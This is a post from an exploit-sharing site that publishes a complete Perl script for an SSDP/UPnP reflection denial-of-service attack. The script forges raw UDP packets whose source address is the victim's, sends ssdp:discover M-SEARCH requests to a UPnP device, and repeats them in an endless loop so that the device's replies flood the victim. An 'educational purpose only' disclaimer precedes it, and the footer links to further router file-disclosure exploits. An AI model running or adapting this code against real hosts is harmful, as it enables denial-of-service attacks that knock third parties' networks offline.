UPNPD M-SEARCH ssdp:discover Reflection Denial Of Service

UPNPD M-SEARCH ssdp:discover Reflection Denial Of Service

Posted by ethical-hacker | Monday December 5th, 2016 | Vulnerabilities
#!/usr/bin/perl
#
#  upnpd M-SEARCH ssdp:discover reflection 
#
#  Copyright 2015 (c) Todor Donev 
#  [email protected]
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  The SSDP protocol can discover Plug & Play devices, 
#  with uPnP (Universal Plug and Play). SSDP is HTTP 
#  like protocol and work with NOTIFY and M-SEARCH 
#  methods.
#
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational 
#  purpose ONLY!
#
#  Wireshark: 
#  udp.port eq 1900 || frame contains "HTTP/1.1 200 OK"
#
#  See also:
#  SSDP Reflection DDoS Attacks 
#  http://tinyurl.com/mqwj6xt
#

use Socket;

if ( $< != 0 ) {
   print "Sorry, must be run as root!\n";
   print "This script use RAW Socket.\n"; 
   exit;
}

my $ssdp   = (gethostbyname($ARGV[0]))[4];    # IP Address Source  (32 bits)
my $victim   = (gethostbyname($ARGV[1]))[4];    # IP Address Source  (32 bits)

print "[ upnpd M-SEARCH ssdp:discover reflection ]\n";
if (!defined $ssdp || !defined $victim) {
    print "[ Usage:  $0 <upnpd> <victim>\n";
    print "[  <todor.donev\@gmail.com>   Todor Donev  ]\n";
    exit;
}
print "[ Sending SSDP packets: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();

    # Main program
sub main {
    my $packet;
    
    $packet = iphdr();
    $packet .= udphdr();
    $packet .= payload();
    # b000000m...
    send_packet($packet);
}

    # IP header (Layer 3)
sub iphdr {
    my $ip_ver           = 4;        # IP Version 4      (4 bits)
    my $iphdr_len        = 5;        # IP Header Length    (4 bits)
    my $ip_tos           = 0;        # Differentiated Services  (8 bits)
    my $ip_total_len     = $iphdr_len + 20;    # IP Header Length + Data  (16 bits)
    my $ip_frag_id       = 0;        # Identification Field    (16 bits)
    my $ip_frag_flag     = 000;        # IP Frag Flags (R DF MF)  (3 bits)
    my $ip_frag_offset   = 0000000000000;    # IP Fragment Offset    (13 bits)
    my $ip_ttl           = 255;        # IP TTL      (8 bits)
    my $ip_proto         = 17;        # IP Protocol      (8 bits)
    my $ip_checksum      = 0;        # IP Checksum      (16 bits)
    # IP Packet construction
  my $iphdr  = pack(
      'H2 H2 n n B16 h2 c n a4 a4',
      $ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
      $ip_frag_id, $ip_frag_flag . $ip_frag_offset,
      $ip_ttl, $ip_proto, $ip_checksum,
      $victim, $ssdp
      );
      return $iphdr;
}

    # UDP header (Layer 4)
sub udphdr {
    my $udp_src_port  = 31337;      # UDP Sort Port    (16 bits) (0-65535)
    my $udp_dst_port  = 1900;        # UDP Dest Port    (16 btis) (0-65535)
    my $udp_len    = 8 + length(payload());  # UDP Length    (16 bits) (0-65535)
    my $udp_checksum   = 0;        # UDP Checksum    (16 bits) (XOR of header)

    # UDP Packet
    my $udphdr    = pack(
      'n n n n',
      $udp_src_port, $udp_dst_port,
      $udp_len, $udp_checksum
      );
  return $udphdr;
}

    # SSDP HTTP like (Layer 7)
sub payload {
    my $data;
    $data .= "M-SEARCH * HTTP\/1.1\r\n";
  #  $data .= "HOST:239.255.255.250:1900\r\n";    # Multicast address
    $data .= "ST:upnp:rootdevice\r\n";      # Search target, search for root devices only  
    $data .= "MAN:\"ssdp:discover\"\r\n";
  #  $data .= "MX:3\r\n\r\n";        # Seconds to delay response
    my $payload = pack('a' . length($data), $data);
return $payload;
}

sub send_packet {
    while(1){
    select(undef, undef, undef, 0.10);      # Sleeping 100 milliseconds
    send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ssdp)) or die $!;
   }
}

Add a comment

Related Blogs

ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # D-Link ADSL ROUTER DSL-2750E SEA_1.07 # Remote File Disclosure # # Modem Name: DSL-2750E # Firmware Version: SEA_1.07 # # Copyright 2016 (c) Todor Donev # &amp;lt;todor.donev...
ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # NETGEAR ADSL ROUTER JNR2010 1.0.0.20 # Authenticated Remote File Disclosure # # Hardware Version: JNR2010 # Firmware Version: 1.0.0.20 # # Copyright 2016 (c) Todor Donev #...
ethical hacker
Posted by ethical-hacker | 05 December 2016
#!/bin/sh # # NETGEAR ADSL ROUTER JNR1010 1.0.0.32 # Authenticated Remote File Disclosure # # Hardware Version: JNR1010 # Firmware Version: 1.0.0.32 # # Copyright 2016 (c) Todor Donev #...